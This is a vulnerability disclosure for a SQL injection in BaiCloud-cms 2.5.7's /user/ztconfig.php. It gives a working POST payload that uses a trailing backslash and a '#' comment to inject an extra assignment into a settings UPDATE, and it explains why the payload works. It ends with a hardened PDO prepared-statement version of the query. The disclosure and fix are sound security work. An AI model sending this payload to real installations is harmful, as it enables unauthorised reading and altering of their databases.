BaiCloud-cms 2.5.7 /user/ztconfig.php SQL injection Vulnerability
bkfish/BaiCloud
BaiCloud

Link URL: https://github.com/meiko-S/BaiCloud

Edition: latest (2.5.7)

0x01 Vulnerability (/user/ztconfig.php line 65)

After logging in as a user, send the following POST request:

POST /user/ztconfig.php
tongji=1\&baidu_map=,baidu_map=user()#&action=modify&bannerheight=1

Then a GET request to /user/ztconfig.php returns the page with the injected result (the output of user()) in the baidu_map setting.

0x02 Analysis

With tongji set to 1\ (a value ending in a backslash) and baidu_map set to ,baidu_map=user()#, the generated query is:

update zzcms_usersetting set comanestyle='',comanecolor='',swf='',daohang='',bannerbg='',bannerheight='1',mobile='0',tongji='1\',baidu_map=',baidu_map=user()#' where username='admin';

The trailing backslash in tongji escapes the single quote that was meant to close the tongji literal, so the literal runs on into the next value and the remainder of baidu_map is parsed as SQL: ",baidu_map=user()" becomes a second assignment and "#" comments out the closing quote and the rest of the statement. The result is a syntactically valid SQL statement that MySQL executes, and when the page is fetched afterwards the stored value of user() is displayed.
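A hardened form of the same UPDATE, added here as an example (it is not code from BaiCloud): with a prepared statement the values travel separately from the SQL text, so neither a trailing backslash nor an embedded quote can change the statement's structure. The table and column names are those in the query above; the PDO DSN, credentials and the use of $_SESSION['username'] for the logged-in user are assumptions.

```php
<?php
// Added example, not BaiCloud's own code. Hardened replacement for the
// settings UPDATE in /user/ztconfig.php: column names come from a fixed
// whitelist and every value is bound as a parameter, so input such as
// "1\" or ",baidu_map=user()#" is stored literally and never parsed as SQL.

function saveUserSetting(PDO $db, string $username, array $post): int
{
    // Only these columns may be written; anything else in $post is ignored.
    $columns = ['comanestyle', 'comanecolor', 'swf', 'daohang', 'bannerbg',
                'bannerheight', 'mobile', 'tongji', 'baidu_map'];

    $assignments = [];
    $params = [];
    foreach ($columns as $col) {
        // Column names are taken from the whitelist above, never from input.
        $assignments[] = "`$col` = :$col";
        $value = $post[$col] ?? '';
        $params[":$col"] = is_string($value) ? $value : '';
    }
    // Numeric-only columns are validated before reaching the database.
    foreach (['bannerheight', 'mobile'] as $intCol) {
        if (!ctype_digit($params[":$intCol"])) {
            $params[":$intCol"] = '0';
        }
    }
    $params[':username'] = $username;

    $sql = 'UPDATE zzcms_usersetting SET ' . implode(', ', $assignments)
         . ' WHERE username = :username';
    $stmt = $db->prepare($sql);
    $stmt->execute($params);   // values are bound, not concatenated into $sql
    return $stmt->rowCount();
}

// Assumed connection details; a real deployment reads these from its config.
$db = new PDO('mysql:host=localhost;dbname=baicloud;charset=utf8mb4',
              'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,  // native server-side prepares
]);

session_start();
// Assumption: the login code stores the authenticated name in the session.
if (isset($_SESSION['username']) && ($_POST['action'] ?? '') === 'modify') {
    saveUserSetting($db, $_SESSION['username'], $_POST);
}
```

With this change the request from 0x01 simply stores the strings 1\ and ,baidu_map=user()# as the user's own settings, which is the behaviour to confirm when verifying a fix.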
